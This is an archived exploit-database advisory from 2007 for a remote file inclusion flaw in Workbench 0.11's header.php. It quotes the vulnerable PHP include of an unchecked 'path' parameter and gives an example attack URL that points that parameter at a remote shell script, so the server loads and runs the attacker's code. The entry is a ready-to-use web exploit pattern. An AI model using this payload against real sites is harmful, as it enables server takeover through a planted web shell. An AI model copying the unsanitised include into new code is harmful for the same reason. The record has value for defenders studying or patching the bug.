workbench 0.11 - 'header.php?path' Remote File Inclusion

Author: kezzap66345
type: webapps
platform: php
port: 
date_added: 2007-05-03 
date_updated: 2016-09-30 
verified: 1 
codes: OSVDB-37682;CVE-2007-2542 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comworkbench-0.11.tar.gz

##############################################################################################
##############################################################################################
#workbench survival guide <=  Remote File Inclusion Vulnerability
#
#Coder:kezzap66345@hotmail.com
#
#Vuln Code
###################################################################################
#
#ERROR:header.php
#
#<td width="100" bgcolor="#9999cc"><?include("$path/navbar.php")?></td>
#
#BUG:
#
#Example:http://site.com/path/header.php?path=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/projects/workbench/
#
#Original W3b
Site############################################################################
#
#http://workbench.sourceforge.net
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]